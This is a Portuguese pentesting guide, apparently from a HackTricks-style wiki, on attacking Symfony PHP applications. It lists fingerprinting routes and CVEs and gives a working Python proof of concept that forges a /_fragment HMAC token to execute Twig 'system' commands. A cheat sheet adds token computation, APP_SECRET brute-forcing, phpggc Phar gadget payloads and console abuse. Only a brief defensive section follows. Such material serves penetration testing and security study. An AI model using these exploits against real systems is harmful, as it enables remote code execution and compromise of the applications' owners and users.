Symfony

Symfony é um dos frameworks PHP mais amplamente utilizados e aparece regularmente em avaliações de alvos empresariais, de e-commerce e CMS (Drupal, Shopware, Ibexa, OroCRM … todos incorporam componentes Symfony). Esta página coleta dicas ofensivas, configurações incorretas comuns e vulnerabilidades recentes que você deve ter em sua lista de verificação ao descobrir uma aplicação Symfony.

Nota histórica: Uma grande parte do ecossistema ainda utiliza a versão 5.4 LTS (EOL Novembro 2025). Sempre verifique a versão menor exata, pois muitos avisos de segurança de 2023-2025 foram corrigidos apenas em lançamentos de patch (por exemplo, 5.4.46 → 5.4.50).

Recon & Enumeração

Finger-printing

• Cabeçalhos de resposta HTTP: X-Powered-By: Symfony, X-Debug-Token, X-Debug-Token-Link ou cookies que começam com sf_redirect, sf_session, MOCKSESSID.
• Vazamentos de código-fonte (composer.json, composer.lock, /vendor/…) frequentemente revelam a versão exata:

curl -s https://target/vendor/composer/installed.json | jq '.[] | select(.name|test("symfony/")) | .name,.version'

• Rotas públicas que existem apenas no Symfony:
• /_profiler (Symfony Profiler & barra de ferramentas de depuração)
• /_wdt/<token> (“Web Debug Toolbar”)
• /_error/{code}.{_format} (páginas de erro formatadas)
• /app_dev.php, /config.php, /config_dev.php (controladores front-end de desenvolvimento pré-4.0)
• Wappalyzer, BuiltWith ou listas de palavras ffuf/feroxbuster: symfony.txt → procure por /_fragment, /_profiler, .env, .htaccess.

Arquivos e endpoints interessantes

Vulnerabilidades de alto impacto (2023-2025)

1. Divulgação de APP_SECRET ➜ RCE via /_fragment (também conhecido como “secret-fragment”)

• CVE-2019-18889 originalmente, mas ainda aparece em alvos modernos quando a depuração é deixada habilitada ou .env é exposto.
• Uma vez que você conheça o APP_SECRET de 32 caracteres, crie um token HMAC e abuse do controlador interno render() para executar Twig arbitrário:

# PoC – requer o segredo
import hmac, hashlib, requests, urllib.parse as u
secret = bytes.fromhex('deadbeef…')
payload = "{{['id']|filter('system')}}"   # RCE em Twig
query = {
'template': '@app/404.html.twig',
'filter': 'raw',
'_format': 'html',
'_locale': 'en',
'globals[cmd]': 'id'
}
qs = u.urlencode(query, doseq=True)
token = hmac.new(secret, qs.encode(), hashlib.sha256).hexdigest()
r = requests.get(f"https://target/_fragment?{qs}&_token={token}")
print(r.text)

• Excelente artigo e script de exploração: blog Ambionics (linkado nas Referências).

2. Sequestro de Processo do Windows – CVE-2024-51736

• O componente Process pesquisou o diretório de trabalho atual antes do PATH no Windows. Um atacante capaz de fazer upload de tar.exe, cmd.exe, etc. em um web-root gravável e acionar Process (por exemplo, extração de arquivos, geração de PDF) ganha execução de comando.
• Corrigido em 5.4.50, 6.4.14, 7.1.7.

3. Fixação de Sessão – CVE-2023-46733

• O guardião de autenticação reutilizou um ID de sessão existente após o login. Se um atacante definir o cookie antes que a vítima se autentique, ele sequestra a conta após o login.

4. XSS no sandbox do Twig – CVE-2023-46734

• Em aplicações que expõem templates controlados pelo usuário (CMS admin, construtor de e-mail), o filtro nl2br poderia ser abusado para contornar o sandbox e injetar JS.

5. Cadeias de gadgets Symfony 1 (ainda encontradas em aplicativos legados)

• phpggc symfony/1 system id produz um payload Phar que aciona RCE quando um unserialize() acontece em classes como sfNamespacedParameterHolder. Verifique endpoints de upload de arquivos e wrappers phar://.

{{#ref}} ../../pentesting-web/deserialization/php-deserialization-+-autoload-classes.md {{#endref}}

Cheat-Sheet de Exploração

Calcular token HMAC para /_fragment

python - <<'PY'
import sys, hmac, hashlib, urllib.parse as u
secret = bytes.fromhex(sys.argv[1])
qs     = u.quote_plus(sys.argv[2], safe='=&')
print(hmac.new(secret, qs.encode(), hashlib.sha256).hexdigest())
PY deadbeef… "template=@App/evil&filter=raw&_format=html"

Bruteforce fraco APP_SECRET

cewl -d3 https://target -w words.txt
symfony-secret-bruteforce.py -w words.txt -c abcdef1234567890 https://target

RCE via exposed Symfony Console

Se bin/console for acessível através de php-fpm ou upload direto de CLI:

php bin/console about        # confirm it works
php bin/console cache:clear --no-warmup

Use gadgets de desserialização dentro do diretório de cache ou escreva um template Twig malicioso que será executado na próxima solicitação.

Notas defensivas

1. Nunca implemente debug (APP_ENV=dev, APP_DEBUG=1) em produção; bloqueie /app_dev.php, /_profiler, /_wdt na configuração do servidor web.
2. Armazene segredos em variáveis de ambiente ou vault/secrets.local.php, nunca em arquivos acessíveis através do document-root.
3. Imponha a gestão de patches – inscreva-se em avisos de segurança do Symfony e mantenha pelo menos o nível de patch LTS.
4. Se você estiver rodando no Windows, atualize imediatamente para mitigar CVE-2024-51736 ou adicione uma defesa em profundidade open_basedir/disable_functions.

Ferramentas ofensivas úteis

• ambionics/symfony-exploits – RCE de fragmento secreto, descoberta de rotas de depuração.
• phpggc – Cadeias de gadgets prontas para Symfony 1 & 2.
• sf-encoder – pequeno auxiliar para calcular HMAC de _fragment (implementação em Go).

Referências

• Ambionics – Symfony “secret-fragment” Remote Code Execution
• Symfony Security Advisory – CVE-2024-51736: Command Execution Hijack on Windows Process Component